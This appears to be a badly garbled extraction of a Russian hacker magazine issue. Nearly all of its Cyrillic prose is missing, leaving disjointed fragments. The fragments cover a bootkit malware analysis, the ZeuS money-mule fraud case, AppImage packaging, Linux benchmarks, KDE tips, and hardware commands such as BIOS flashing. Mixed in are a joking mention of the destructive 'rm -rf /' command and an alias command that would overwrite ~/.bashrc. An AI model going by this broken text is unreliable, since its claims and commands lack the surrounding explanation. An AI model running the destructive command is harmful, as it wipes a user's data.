: Windows XP
: half-open.com


,
Windows XP / Half-open limit fix.


TCP-
(half-open connections connection attempts)
tcpip.sys.

Microsoft SP2 (Service Pack 2)
Windows XP.
, DoS-.
, 10 .
.

.
Half-open limit fix ,
.
, 100. z

067

MALWARE
, Senior Malware Analyst, Heuristic detection group, Kaspersky Lab

Trojan
- Cl

icker.Win32.

Trojan-Clicker.Win32.
Whistler -

Trojan-Clicker.Win32.
Whistler.a. , .
.
.

, ,
.
. PE-,
Microsoft Visual Studio 5.0 ( GUI).
, ,
. .rdata .
Whistler
VMWare RedPill.
.
(Ring 3) in
,
.
, , API VirtualAlloc , . CreateThread
.
WaitForSingleObject.
, , ,
, , .
, .. ,
Process Explorer
FindWindowW("PROCMON_WINDOW_CLASS"),
TrueCrypt

068

TrueCrypt, CreateFileW("\\\\.\\
TrueCrypt", ). .
, ,
.


BIOS .
CR0, EDX, EFlags, IP.
IP FFF0h, BIOS, , ..
CS 0xF000. ,
( , 0xAA55 ),
7C00h.
.
, , .
200h ,
, .
: , ,
? , , , MBR (Master
Boot Record). 512 . MBR
, ,
X 12 /143/ 10

MBR, 0x200
AA55

0x1BE

0x1BE

0x10

#1

0x1CE

0x10

#2

0x1DE

0x10

#3

0x1EE

0x10

#4

0x1FE

0xAA55

1. MBR
2


MBR
0xAA55 . . MBR
(. 1).
MBR,
.
( 2).
0, 0x80. 0x80,
, 0x200
. (
) ( 3). ,
.
Windows
? , ( 7)

. ,
.
. (.
MBR). ,
: MBR ,
0x80, , .

int 13

0x0C

2.

NTFS

0x0B

FAT32

0x17

NTFS

3. .
, (real-address mode).
(protected mode), (Linux, Windows, FreeBSD ..).
, ,
, GDTR, LDTR, CR3 .

BIOS.
-,
. :
mov eax,
[1000:FFFF];
4 0x1000 << 4
= 0x10000;

0x10000 + 0xFFFF = 0x1FFFF;

Whistler

, ,
. , MBR ,
\\.\PhysicalDriveX CreateFile.
,
. MBR, Whistler,
,
PE. , . . exe,
. , X 12 /143/ 10

069

MALWARE


Whistler

RedPill Trojan-Clicker.
Win32.Whistler.a

MBR Bochs Enhanced Debugger


for Windows
, . MBR.
Bochs
for Windows .
. .
MBR
BIOS. ,
, BIOS ,
.
, c , , .
-
int 13h, MBR
. int 13h
NTLDR . : 0xB8
REPNE SCASB,
CMP. , NTLDR , BlLoadBootDrivers
. .

. , IoInitSystem.
,
IoInitSystem, . Whistler ,
, .

070

Trojan-Clicker.Win32.Whistler.a
.
,
.
MBR , .
Stoned Bootkit FrameWork, European Union Public License.
, , .
\\.\physicaldrive0,
PE
APC. APC Asynchronous Procedure Call ,
.
Windows , APC , , ,
.
winlogon.exe, KeStackAttachProcess
. KeInitializeApc
APC-,
KeInsertQueueApc,
. , : \\??\C:\
System Volume Information\Microsoft\.

Whistler,
, ,
. , , .
, Microsoft Visual Studio.
.
, ,
banner3.php .

. , ,
Windows,
, Windows 7, . Windows XP . ,
Bochs
VMWare PETools , , Hiew
. IDA Hex-Rays
PE'. ,
, , Hiew
\\.\physicaldriveX. z
X 12 /143/ 10


Mifrill (mifrill@real.xakep.ru)

, ,
,
. , ,
.
,
.

Trident Breach

-

Trident Breach (:
), ,
,
ZeuS-.
ZeuS
;
.
, ZeuS, Zbot, PRG, Wsnpoem, Gorhax
Kneber
.

, ,


IT-
.
.

, ,
.
.
,
, ,
2009 .
46
, ,

ZeuS-.
,
. -

072
074

,
( ,
), ,

, .
,
- ,

.
. ,
,
, .


,
, , ,
.

:
e-mail- (
ZeuS).

,
, , , .
, ,

. ,

$220 ., , ( ) $70
. , :
,

.
, ?
. ,

,
( money
mule ) ,

( ) ,
.

,
Trident Breach, 20 25 ,
, ,
.
( )
,
-. ,
.
, . ,
, ... ,
, , ,
J-1,
Work&Travel. , :
W&T -
, ,
.
, .

,

.
? ,
.
, ,
X 12 /143/ 10



. ,
,

.



;
$3000.

,
- .

1. ,

2.

3. -

4. -

5.

6.

8.

7.


-
,


: 390
: $220
: $70

: 92 39
: 20 8
: 5 8

X 12 /143/ 10

073

? ,
ZeuS
(
,
). ,
5-20% .
. , ,
,
.
:
,
PIN-.

.
.

. Trident Breach


.
( )
,
Jack Daniels. Jack Daniels,
26- ,
:
,
.

, ,
.

-,

074

. , Jack Daniels
,

$9983.
Jack Daniels
,
.
.

, Jack Daniels

. , ,
: 10
$38 314 . ,
20
$500 000. , ,
,
:).
,

. ,
.
39 ,
92 !
-,
,

. , ,

,
TD Bank,
Chase Bank, Bank of America Wachovia,
,

. , :
, , -,
.

-


, ,

.
: 10 30 $250 000 $1
. . , ,
,
.
, , , 20
(
)
.

, . , ,
, ,
, . , ,
ZBot
(,
, ).

, ,
,

ZeuS,
.
, , .
,
, ,
. , , Trident Breach ,


, ,
.
,
, $70 .
,
,
. z
X 12 /143/ 10

OPHCRACK 3.3.0
( MB)

WIRESHARK 1.2.2
( MB)

GPODDER 2.5 UNIXOID


zobni n@gmail.com
( MB)

WEBILDER 0.6.9
( MB)

FFMPEG
( MB)
EMESENE 1.6.3
( MB)

TRANSMISSION 2.03
( MB)

VLC 1.2.0-GIT
( MB)

TRANSMISSION 1.92
( MB)

VLC 1.1.1
( MB)

ZENMAP 5.00
( MB)

UPDATER 0.1
( MB)

XARA EXTREME 0.7


( MB)

TUCAN MANAGER 0.3.8


( MB)

VIEWNIOR 1.0
( MB)

AMULE 2.2.6
( MB)

XNOISE 0.1.10
( MB)

UPDATER 0.0.4
( MB)

TORRENT SEARCH 0.8.1


( MB)
TERMINATOR 0.93
( MB)

UPDATER 0.1.1
( MB)

TERMINAL 0.4.3
( MB)

UPDATER 0.0.9
( MB)

TEAMVIEWER 5
( MB)

XCHAT 2.8.6
( MB)

UPDATER 0.0.6
( MB)

XBMC MEDIA CENTER SVN32789


( MB)

UPDATER 0.0.5
( MB)

SPOTIFY 0.4.8.213
( MB)
SPOTIFY 0.4.6.75
( MB)

Elementary Project
Linux-
AppImage,

. , ,
Linux,
.

Elementary Project (
, ,
Ubuntu, www.elementary-project.com)
, Windows
(Portable Apps),
: (,
, ),
(
)
(
). :
.
( )
.

076

, Dropbox,
,
.
.
, .
?
.

AppImage- Portable Linux Apps


(www.portablelinuxapps.org),
.

(Kubuntu
10.04 x64). Opera 10.70

15 ,

( ,
AppImage-

.appimage, ).
file
ELF 32-bit LSB executable, Intel 80386
.
(chmod +x Opera\ 10.70), , libfuse.so.2 .


.
, , .
ldd, -,

libc libfuse libglib-2.0.
fuse,
X 12 /143/ 10

SPOTIFY 0.4.3
( MB)

SKYPE 2.1.0.81
( MB)

SPIDEROAK
( MB)

SIGIL 0.2.4
( MB)

SHOTWEL
PHOTO
VIEWER
0.6.1
( MB)

SHOTWEL
PHOTO
MANAGER
0.5.0
( MB)

AppImage

. ,

.
.opera,
,
( ,

Dropbox).
, AppImage ,
(64- ),
.
.

AppImageAssistant
AppImage

( , ),
? ,
GTK ( Gnome),
, mc. ,
.
Kubuntu libglib-2.0 ,
libfuse. sudo apt-get install libfuse2 libfuse2. ,
(, NTFS-3g,
Ubuntu), ?
: 64- libfuse
32- ,
Opera 10.70. : 32-
.
, 32- Ubuntu 10.04 .
Opera 10.70, ,
X 12 /143/ 10

, , Deb RPM. AppImage


,
, ISO-, ,
.
AppImage
ISO-. ,
mount
. ( , )
( ),
( fuse)
AppRun,
. AppImage- ,
.
ISO-,
, :
$ mkdir /tmp/appimage
$ sudo mount -o loop Opera\ 10.70 /tmp/appimage
$ cd /tmp/appimage && ls

077

OPHCRACK 3.3.0
( MB)
GPODDER 2.5 UNIXOID
( MB)

XBMC MEDIA CENTER SVN32789


( MB)
WIRESHARK 1.2.2
( MB)

FFMPEG
( MB)

VLC 1.1.1
( MB)

UPDATER 0
( MB)

AppImage RISC OS

EMESENE
1.6.3
( MB)

AMULE
2.2.6
( MB)
ZENMAP
5.00
( MB)
XNOISE
0.1.10
( MB)

VLC 1.2.0-GIT
( MB)

mount , AppImage

WEBILDER
? -, AppRun,
0.6.9
ISO-.
XARA EXTREME
0.7
( MB)
.
( MB)

XCHAT 2.8.6
( MB)

APPRUN
HERE=$(dirname $(readlink -f "${0}"))
export OPERA_DIR="${HERE}"/share/opera
exec "${HERE}"/lib/opera/opera "$@"

VIEWNIOR 1.0
( MB)

OPERA_DIR
/_/share/opera
/_/lib/opera. , OPERA_DIR
, /usr/share/opera. ,
AppRun
, (,
), .
AppImage opera-browser.desktop, , , (
opera-browser.png), , ,
, ..
( freedesktop). .DirIcon.
.
LICENSE, install, opera-widget-manager
share lib,
/usr/share /usr/lib.
, , man-, . Opera ( ,
Xlib X Window),
lib ,
Gstreamer. ,
, ,
.

AppImage

AppImage- ,
.
:
(, ,
-)
AppRun
.desktop,
: , AppRun .desktop- (

078

1988 Acorn Computers RISC OS 2.00,


. ,
AppDir:
, . ,
!Run, .
NEXTSTEP, ,
ROX-Filer (
RISC OS on X).
ROX ,
!Run AppRun, !Sprites .DirIcon,

.appdir. AppImage
.desktop-.

)
( MB) deb-
. , - ,
TRA . ,
Elementary Project (www.
elementary-project.com/wiki/index.php?title=Creating_AppImages).

:
$ ar xv .deb

: control.tar.gz, data.tar.gz debian-binary.


, .
. :
$ tar xzf data.tar.gz

,
.appdir:
$ mv data .appdir

_.desktop .appdir/
usr/share/applications .appdir.
AppRun, Elementary Project:
$ cd .appdir
$ wget www.elementary-project.com/downloads/AppRun
$ chmod +x AppRun

AppRun, . , ,
AppDir (Application Directory) ,
. ISO .
AppImageAssistant (www.elementaryproject.com/downloads/apps/AppImageAssistant).
, Forward, .
appdir Forward. , AppImage .
(,
Elementary Project). .
, .desktop-, AppDir, .
X 12 /143/ 10

UPDATER 0
( MB)

UPDATER 0
( MB)

UPDATER 0
( MB)

UPDATER 0
( MB)

UPDATER 0
( MB)
TUCAN
MANAGER

TRANSMISSION 1.92
( MB)

0.93
( MB)
TERMINAL 0.4.3
( MB)

TORRENT SEARCH 0.8.1


( MB)

ER 0.1

ER 0.1.1

ER 0.0.9

ER 0.0.6

ER 0.0.5
Opera,

ER 0.0.4

N
GER 0.3.8


Ryan C. Gordon FatELF,
. ,
ARM x86.
FatELF
- ,
.

,
,
, ,
. AppRun,
Elementary Project,
. ,
.desktop-
,
AppDir (, .appdir/usr/lib .
appdir/usr/bin) . ,
- /usr/share,
AppImage ,
. ,
Opera
OPERA_DIR,
.

, -
, .
DOS, - ,
Portable. ,
NEXTSTEP Mac OS X.
.app ( ,
), .

RISC OS,
ROX ( AppImage RISC OS).
UNIX-
. UNIX
. , ,
X 12 /143/ 10

portablelinuxapps.org portable-
. UNIX
TEAMVIEWER
5

.
( MB)
TERMINATOR
/bin,
/lib. ,
.
UNIX , ,
- ( make install ). , ,
,
,
, 40 ,
, , .
, , ,
,
.
dll hell (
, , , ), /usr (
?),
( apt-get install firefox3 firefox4
) (
). . ,
UNIX ,

, .
Linux
. Zero Install
(zero-install.sourceforge.net),
.
Klick (klik.atekon.de)
. AppImage.

AppImage- ,
, . ,
Linux,
, Linux
Linux' . z

079

UNIXOID
grinder grinder@tux.in.ua

: Linux Mint 9
vs Calculate Linux Desktop 10.9

Gentoo
, .
gcc
,
. ,
.

Linux?

,
?
,
,
. 21
source-based -

080

Gentoo Crux. -
,
CPU Celeron 300A.
, FreeBSD,
, ,
Linux.

,

Debian Ubuntu. ,

,
, .

. , , . Gentoo,
, ,
Stage
X 12 /143/ 10

HTTP://WWW
links
Phoronix Test
Suite phoronix-testsuite.com
GCC gcc.gnu.
org/onlinedocs
, :
en.gentoo wiki.com/
wiki/Safe_Cflags/Intel,
en.gentoo-wiki.com/
wiki/Safe_Cflags/AMD
CLD
calculate-linux.ru/
main/ru/optimization_
of_system

QGears2
1 Stage 2, , ,
, . 3-5%,
Stage 1 2, Stage 3, .
C , : x86 x64 (
). ,
, .
, x86 , .
, .
, , , : Linux
Mint 9 source-based Calculate Linux Desktop 10.9 beta (CLD).
Ubuntu ,
.
Gentoo, , ,
( CLD Gentoo).
,
PR.
Linux Mint , i386 amd64. CLD 10.9 beta
i686 , .
Linux Mint 9 Isadora
: linuxmint.com
: 18 2010
: GNU GPL
X 12 /143/ 10

: x86_32, x86_64
: kernel 2.6.32, glibc 2.11.1, GCC
4.4.3, UDEV 151, HAL 0.5.14, X.Org 1.7.6, Compiz 0.8.4,
GNOME 2.30.0, Mesa 7.7.1
Calculate Linux Desktop 10.9 beta
: calculate-linux.ru
: 26 2010
: GNU GPL
: x86_32, x86_64 ( )
: kernel 2.6.34.4, glibc 2.11.2, GCC
4.4.3, UDEV 151, HAL 0.5.14, X.Org 1.7.7, Compiz 0.8.4,
GNOME 2.30.0, Mesa 7.8.2

,
. X.Org. : AMD
Athlon 64 X2 Dual-Core 3600+/2 /Seagate Barracuda ST3160815A/
ATI Radeon X800 GTO.
Phoronix Test
Suite 2.8 Lyngen (phoronix-test-suite.com), 130
. Debian/Ubuntu deb-.
Gentoo ebuild, ,
CLD Generic Pckage.
php cli,
emerge. ,
phoronix-test-suite list-tests,
phoronix-test-suite info <test name> ( Test Type
) , , phoronix-test-suite benchmark <test
name>.

, .
~/.phoronix-test-suite. ,

081

UNIXOID

Ubuntu/Debian
Gentoo ,
, .
, , , Gentoo.
, /etc/apt/sources.list
, deb-src. Linux Mint . apt-get update apt-build:
$ sudo apt-get install apt-build

Phoronix Test Suite GUI


,
, 1,5 , .
phoronix-test-suite make-download-cache.
download-cache.
test-result.
.
, . , 133 ( ,
), 10 (
VERIFIED, FREE). , : build-mplayer, john-the-ripper (Traditional DES), compress-gzip
( 2 ) encode-flac, encode-ogg, mencoder (
AVI to LAVC), openssl. ,
warsow ( 800x600),
FPS (warsow.net), OpenGL-
qgears2. , qgears2 CLD,
:
# emerge qt-opengl


phpbench, PHP-. Phoronix Test
Suite 3-5 . , ,
.

32 vs 64

Linux
: 32- 64- .
,
. 32-

i386, i486, i586 i686, , . ,
P6 (i686, Pentium Pro) 1995
, . ,
i386-i586, , (
,
][ 04.2007 ..) ,
( MMX, SSE, 3DNow ..),
.
32 Linux Mint 9 ( Ubuntu) i386 , - . ,

082


.
dpkg-reconfigure apt-build.
apt-get aptitude apt-build, . ,
, apt-build update, apt-build install
_. , aptbuild upgrade, apt-build world .
--force-yes .
/usr/
share/doc/apt-build/README.Debian,
. ,
:
$ sudo dpkg --get-selections | awk '{if ($2 ==
"install") print $1}'> /etc/apt/apt-build.list

Ubuntu 32 Recommended for most


users, 64- : Not recommended for daily desktop
usage. ,
64-. :
Linux Mint 9 (32bit)
warsow - 2.57 FPS
build-mplayer - 260.97 sec
john-the-ripper - 950160333 Real C/S
compress-gzip - 54.61 sec
encode-flac - 25.70 sec
encode-ogg - 36.87 sec
mencoder (AVI to LAVC) - 54.27
openssl - 11.90 Signs PS
phpbench - 19573.00 Score
QGears2:
CPU-based Raster - Test: Gears - 24.49 FPS
XRender Extension - Test: Gears - 42.32 FPS
OpenGL - Test: Gears - 67.68 FPS
Linux Mint 9 (64bit)
warsow - 2.60 FPS
build-mplayer - 194 sec
john-the-ripper - 928921000 Real C/S
compress-gzip - 55.17 sec
encode-flac - 14.57 sec
encode-ogg - 25.39 sec
mencoder (AVI to LAVC) - 53.24 sec
openssl - 37.75 Signs PS
phpbench - 28621 Score
QGears2:
CPU-based Raster - Test: Gears - 25.64 FPS
XRender Extension - Test: Gears - 48.72 FPS
OpenGL - Test: Gears - 87.56 FPS
X 12 /143/ 10

John the Ripper 32- , 2%

PHPBench 64- Linux


Mint

64-
32- .
2-8%.
PHPBench 46%. ,
64- 32 John
the Ripper. , JTR , 64 . , CLD, i686-
.

CLD

Calculate Linux Desktop 10.9 beta ( )


warsow - 2.60 FPS
build-mplayer - 68.85 sec
john-the-ripper - 949247333 Real C/S
compress-gzip - 55.83 sec
encode-flac - 15.87 sec
encode-ogg - 32.80 sec
mencoder (AVI to LAVC) - 53.10 sec
openssl - 11.8 SPS
phpbench - 24907 Score
QGears2:
CPU-based Raster - Test: Gears - 25.30 FPS
XRender Extension - Test: Gears - 53.86 FPS
OpenGL - Test: Gears - 135.79 FPS

. ,
MPlayer 32- CLD 64- Linux
Mint 3 . WAV- FLAC CLD
64- Linux Mint, OGG
64- .

.
OpenSSL, , 32- 64-. PHPBench 32-
CLD 64- 25%,
32- Linux Mint.
FPS Warsow , , , Mesa. OpenGL QGears2 CLD
, , Mesa.
, ,
Gentoo ,
. , ,
64- CLD ,
Linux Mint x64. ,
.
X 12 /143/ 10

, source-based
,

.
( -march -mtune ;
native,
/proc/cpuinfo), , , ,
.
, ,
, , /,
. , -
,
, . GCC : -O0
( ) -O3 ( ) -Qs
( ).
, ,
. -O2, -O3 .
, ,
(, -fomit-frame-pointer, -ffastmath, -funroll-loops). ,
CFLAGS, :
$ gcc -Q --help=optimizers | grep enabled

man
gcc GCC (gcc.gnu.org/onlinedocs/).
Gentoo , Portage,
/etc/make.conf. .
CHOST , CFLAGS
. MAKEOPTS , ,
(
). LINGUAS. CLD make.conf
, ( calculate-linux.ru/
main/ru/optimization_of_system).
:
# cat /etc/make.conf
/usr/share/calculate/templates/install/merge/

083

UNIXOID


OGG 64-
Linux Mint
portage/make.conf
LINGUAS="en ru"
ACCEPT_LICENSE="*"
source /var/lib/layman/make.conf
CFLAGS="-march=native -O2 -pipe -fomit-frame-pointer"
CXXFLAGS="${CFLAGS}"
MAKEOPTS="-j3"
EMERGE_DEFAULT_OPTS="--jobs=4"

:
# emerge -e system
# emerge -e world

mencoder, QGears2), - (encodeflac, phpbench). , , ,


. ,
, .

,
, .
64- .
. ,
.z

.
Calculate Linux Desktop 10.9 beta ( )
warsow - 2.60 FPS
build-mplayer - 68.14 sec
john-the-ripper - 949691333 Real C/S
compress-gzip - 52.10 sec
encode-flac - 15.92 sec
encode-ogg - 32.44 sec
mencoder (AVI to LAVC) - 50.59 sec
openssl - 11.8 SPS
phpbench - 24511 Score
QGears2:
CPU-based Raster - Test: Gears - 25.35 FPS
XRender Extension - Test: Gears - 53.78 FPS
OpenGL - Test: Gears - 142.39 FPS

, . -
(build-mplayer, john-the-ripper, compress-gzip, encode-ogg,

084

QGears2 CLD 64- Linux Mint


X 12 /143/ 10

UNIXOID
Adept adeptg@gmail.com


DE
KDE 4.0 ,

KDE 3.5.
, ,
Qt KDE4
DE .
KDE, .
Plasma widgets

KDE4
KDE3 Plasma,
, KDesktop, Kicker
SuperKaramba. .

.
SuperKaramba, Google
Gadgets, Mac OS X Dashboard,
. ,
:

086

folder view (
) ,
.
; , , /tmp.

Flash (*.flv).
, YouTube :).
pastebin ,

( pastebin.

ca pastebin.com)
( imagebin.ca, imageshack.us, simplestimage-hosting.net imgur.com). ,
Dolphin , ,
KSnapshot
Pastebin. ,
.
paste ( )
,
.
X 12 /143/ 10

INFO

info

<Alt+Tab>

kubuntu

: sudo aptget install plasmawidget-*.

krunner

.
tail ( ) ,
.
.
.
google translator ,
translate.
google.com.
plasmacon (konsole)
. .
easy SSH connection
SSH-.
web slice ( Web) ,
- .
RSS ( ,
).
microblogging .
lancelot kickoff. krunner
. .
,
.
, , Amarok ( ).
,
zeroconf (, avahidaemon). : Share
( ) Share this widget on the network
( ).
, ,
,
. , dolphin network:/.
,

. , - .
.

Plasma activites

, , Plasma
Activites. , ,
,
. ? X 12 /143/ 10

Live-
KDE
:
http://home.kde.
org/~kdelive/

.
, .
vim/emacs/eclipse ( ) . .

, , IM-
(
),
.. , , .
. . .
, -
.
, ,
:). .
. , ?
KDE . -
, - 4.8. :
/ , (
Super-Q).
,
( gnome_killer- :) ).
: System Settings (
) Window Behavior ( )
Virtual Desktops ( ) Different widgets
for each desktop ( ).
,

. ;
- : .

Plasma netbook

Plasma ,

/.
. : System Settings (
) Workspace ( Plasma)
Workspace type ( )
Netbook ().

Search and Launch.
( -

Zeroconf (Zero Configuration Networking) ,


IP-.
Avahi
zeroconf.

HTTP://WWW
links
kde.org

planetkde.org

KDE
userbase.kde.
org KDE
(wiki)
www.kdedevelopers.org
KDE
windows.kde.
org KDE
Windows

WARNING
warning
KDE
4.5,



.

087

UNIXOID

klipper

krunner) .
, .
, taskbar'
( ) ( )
.

, /
, , ,
. . <Alt+Tab>, taskbar'.
Search and Launch,

, (
page one). page one ,
. , Plasma
, Add page ( ).
Plasma Netbook ,
.

kwin

KDE.
, compiz, () Intel',
, WM.
-, kwin . ,

. System
Settings ( ) Desktop Effects ( ).
kwin
, ,
.
.
Move Window to Group (
). -
, konsole dolphin.
kwin
. , ,
rekonq
. :
Advanced ()
Special Application Settings ( ).
edge snapping. : () , ().
, .
KDE 4.5, kwim (tailing)
. , ,

088

KDE4 , (,
) Windows Mac OS X.
, KDE WinXP,
. , .
KDE SC
4.5.1, Win 4.4.4. WinXP .
windows.kde.org ( ;
).
: ---.
:
, . winkde.org , nightly.
, .
, KDE Win .

.
. :
xmonad, ion3, ratpoison , .
, , . , : System Settings ( ) Window Behavior ( ) Advanced
() Enable tiling ( ).
:
(Spiral) ( )
.

.
(Columns) : ,
.
(Floating) ,
.
Spiral. ,
( )
. :
Float
Window ( ).

.
, /.
, WM,
(: ). ,
,
. , .

krunner

,
krunner. ,
<Alt+F2>. , , krunner (
Nepomuk). ,
<Tab>/<Tab+Shift>
/. , .
Krunner ,
, , 16*1024=.
X 12 /143/ 10

Plasma Netbook

Tailing

KDE


. (sin, cos ..), (sqrt) . , krunner
, ,
, rm -rf / :). krunner , , 21,5 , . , , , , ,
. xakep.ru,
. , :
ggk: some_word some_word
wp: some_word some_word

krunner Konqueror' rekonq (


).
: krunner (,
) , kopete amarok
, . ,
.

Klipper

KDE .
klipper, .
, .
. ,
clck.ru,
(^(http|https|ftp):\/\/[a-z0-9]+([\-\.]
{1}[a-z0-9]+)*\.[a-z]{2,5}(([0-9]{1,5})?\/.*)?$),
lwp-request http://clck.ru/--?url=%s.
.
Shortcuts ( ) ,
Manually Invoke Action on Current Clipboard (
X 12 /143/ 10

) ( <CtrlAlt-R>). ,
, .

KDE . .
, ,
. Dolphin timeline,
. ,
Strigi : Desktop Search ( ) Enable Strigi Desktop File Indexer
( Strigi). File Indexing
( ) ,
, . Strigi
( ODT, PDF, MP3) , ,
,
,
.
Dolphin (Settings ()
Toolbar Shown ( ) Search Toolbar
( )) Nepomuk.
nepomuksearch:/KDE.
.

KDE4 DE .
Gnome

Gnome3. ,
KDE, . ,
. z

089

UNIXOID
zobni n@gmail.com

Linux
- ,
200 , HAL udev
.
UNIX ,
.
Linux
, ,
,
.
, UNIX-
,
Windows
. ,
,

. Linux
. , ,

? ,
,
.

090

7.3 X.Org ,

.
, .



. ,

,
( ,
).
(
,
- ).


,
,
<Fn>, , X 12 /143/ 10

ddccontrol

INFO

info




lshw.
nvramwakeup




BIOS.

flashrom , BIOS

. ,
UNIX . -
, ,
.
, (
) ,
Synaptics. X.Org , ,
. synclient
, syndaemon -
. , Linux-
,
(,
ASUS /etc/acpi/events/asus-touchpad, /etc/apci/asus-touchpad.sh).
, .
, (

, ,
).
, synaptics
, xorg.conf.
. X- (
1.8) , ,
/usr/lib/X11/xorg.conf.d.
( ,
, , xorg.conf
-). 10-synaptics.conf
InputClass,
,
Option "SHMConfig" "true" (
), . :
#
X 12 /143/ 10

BIOS


modprobe nvram
&& dd if=/dev/nvram
of=nvram.bin.

Option "VertTwoFingerScroll" "1"


Option "HorizTwoFingerScroll" "1"
#
Option "AccelFactor" "0.010"
#
Option "CircularScrolling" "on"
Option "CircScrollTrigger" "0"

,
. -, synaptics ,

, ,

- .
(
).
-, KDE/Gnome, gsynaptics
synclient ( X.Org , , ,
). X.Org,
. ASUS (
) . :
$ synclient TouchpadOff=1

. . ,
( ~/.xinitrc DE):
$ syndaemon -K -d -i 1

'-K' syndaemon
,

091

UNIXOID



xrandr
Intel
* LVDS:
* TMDS-1: DVI
* VGA: VGA
* TV: TV-
ATI
* LVDS:
* DVI-0: DVI
* DVI-1: DVI
* VGA-0: VGA
* VGA-1: VGA
Nvidia ( )
* LVDS:
* DVI0: DVI
* DVI1: DVI
* VGA0: VGA
* VGA1: VGA

xrandr KDE

, '-d' ,
'-i' . '-t',
, .
, , , , :
ACTION=="add", SUBSYSTEM=="input", ID_CLASS="mouse",
RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", ID_CLASS="mouse",
RUN+="/usr/bin/synclient TouchpadOff=0"

/etc/udev/rules.d/01touchpad.rules. .


- .
( ) . ,
, , VGA- HDMI. ,
, , ,
.
,
(,
KDE ).
KDE,
.

X-.
: Xinerama, DEC ( PanoramiX),
RandR, ,
Xinerama.
,

X.Org ( , ,
Xinerama
,
).
Xinerama, RandR
( !),
OpenGL AIGLX ( Compiz'
FlightGear!) . ,
dual head xrandr
( ):

092

1. xrandr -q (
xrandr ). VGA- VGA-1 , VGA-0
, disconnected, .
2. , xrandr -q
connected VGA-0.
DDC ( ),
.
3. :
$ xrandr --output VGA-0 --auto

$ xrandr --output VGA-0 --mode 1024x768 --auto

.

(
).
( , ),
.
, , .
4. :
$ xrandr --output VGA-0 --right-of LVDS

,
( 1024x768 2048x768).
,
(LVDS ) .
'--right-of', ,
. xrandr '--left-of' (), '--above' () '--below' ().
, , '--pos'. :
$ xrandr --output VGA-0 --pos 1024x0
X 12 /143/ 10

xrandr -q


SATA-
2.6, Linux
SCSI-, SATA. ,
,
. ,
,
( sda
: sda1 sda2)
#
#
#
#

sync; sync
umount /dev/sda1
umount /dev/sda2
echo 1 >/sys/block/sda/device/delete

SATA-
:
# echo "- - -" >/sys/class/scsi_host/host{0..3}/scan

, ,
. ,
nVidia . nVidia (Intel, nVidia, AMD/
ATi), RandR
1.2, ,
.
TwinView,
nvidia-settings ( ,
, ).

DDC (Display Data Channel)


,
, .


, , .
DDC
,
.
, ,
X 12 /143/ 10

. , ,
,

, ,

.
DDC , I2C (InterIntegrated Circuit).
VGA-, .
DDC
,
(
, ), , ,
, ,
256 ( ,
). DDC
, ,
( ).
, DDC
. ,
. -, ddccontrol,
, ,
. -, ddccontrol,
, ( ),
. -,
( 256 ) ,
.
, . ddccontrol:
$ sudo apt-get install ddccontrol

'-p', :
$ sudo ddccontrol -p

, . ,
I2C :
$ sudo modprobe i2c-dev
$ sudo su
# echo i2c-dev >> /etc/modules

. ! . ,
,
, . ddccontrol -

093

UNIXOID

lshw
,
VESA.
, (
0x10 0x12, 50 127).
:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0x10


Linux, -, Linux

flashrom.
flashrom
OpenBIOS,
. flashrom

,
BIOS, .
, http://flashrom.org,
Linux-
BSD-.
,
. flashrom ,
, 100%
EEPROM,
BIOS ( ).
,
'--force'
.
, EEPROM:

$ sudo ddccontrol dev:/dev/i2c-1 -r 0x10 -w 50


$ sudo flashrom

dev:/dev/i2c-1 I2C- ddccontrol -p, 0x10 , 50 .


, ,
cron (,
).
VESA. , 0xe1
:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0xe1 -w 0
$ sudo ddccontrol dev:/dev/i2c-1 -r 0xe1 -w 1

(
, BIOS
), No
EEPROM/flash device found, ,
.

( ,
):
$ sudo flashrom -r old_bios.bin

:
alias :
$ sudo flashrom -w new_bios.bin
$ sudo su
# echo "alias haltmon='ddccontrol dev:/dev/i2c-1 \
-r 0xe1 -w 0'" > ~/.bashrc

, :
$ sudo su
# mplayer .avi; haltmon

Samsung'
,
.
(, Game ).
ddccontrol
( 0xdc
).

BIOS

, BIOS
, DOS. , . ,

094


( ):
$ sudo flashrom -v new_bios.bin

EEPROM- ,
'-c',
( ).
. BIOS Linux , . , ,
SSH- (
Puppet, ).

UNIX- .
, , LFS .
, , ,
. z
X 12 /143/ 10

CODING
seva@vingrad.ru

- !
Mac OS
Objective-C

,
C/C++ Java, Objective-C
.
API Cocoa. Objective-C Cocoa .
C ...
C

Objective-C , 1986 , Brad Cox Tom Love Stepstone.


, - , .
C,
Smalltalk, .
-
Objective-C C. ,

Apple, ...
Apple 1980 .

Coca-Cola (John
Sculley). Apple
, NeXT. NeXT
.

bjective-C API. NeXT

096

NeXTStep. ,
ObjC. NeXT
Sun Microsystems NeXTStep
OPENStep (
GNUStep, ). 1990-
Apple, .

Mac OS.
Apple ,
. , ,
NeXT. Apple, NeXTStep
Mac OS X, Objective-C Mac- API Mac OS X.

, Objective-C -
. , , , ?
Objective-C :
Objective-C . ,
- .
X 12 /143/ 10

>> coding

XCode 4 - Interface Builder

Cocoa
,
. ,

Objective-C ( ++, -, ).
Objective-C message-oriented language,
, C++ Java,
. -
, ,
,
,
, ,
. , ,
.

, . Objective-C
; ,

, ( ) instance-, ,

( ,
,
C++ Java) ..

, !

- : .
!.
,
! HelloWorld Obj-C. ,
Mac OS X ,
Objective-C Cocoa c
GCC OpenStep.
X 12 /143/ 10

ObjC
#import <Cocoa/Cocoa.h>
void main()
{
NSLog(@"Hello world!");
}

HTTP://WWW
links

HelloWorld C++, ?
, , ,
.
#import ,
#include, , ,
,
, C++ (#include, , ).
Cocoa.h , ,
Cocoa, .
NSLog . stdout timestamp
. NeXTStep? NS
:).
Objective-C . NSLog C-, NSString.
NSLog?
ObjC NSString
ocoa zerro-terminated ,
C, NSString
(NSMutableString ). Cocoa , NSString
,
. , , ,
.
XCode .
XCode , Mac OS iOS.
, , ,
.
Interface Builder,
SCM .
Apple
GCC. GDB.

developer.apple.com
,
Mac OS
www.cimgf.com
Cocoa
Objective-C
www.gnustep.org
GNUStep
www.cocotron.org

ObjC, XCode
Cocoa Windows

DVD
dvd

XCode

097

CODING

XML-
// Cocoa
#import <Cocoa/Cocoa.h>

names = [valute elementsForName: @"CharCode"];


NSArray * values = nil;
values = [valute elementsForName: @"Value"];
// , ?
if ([names count] > 0 && [values count] > 0)
{
// CharCode - Value
// NSMutableDictionary
[Valutes setObject:
[(NSXMLElement *)
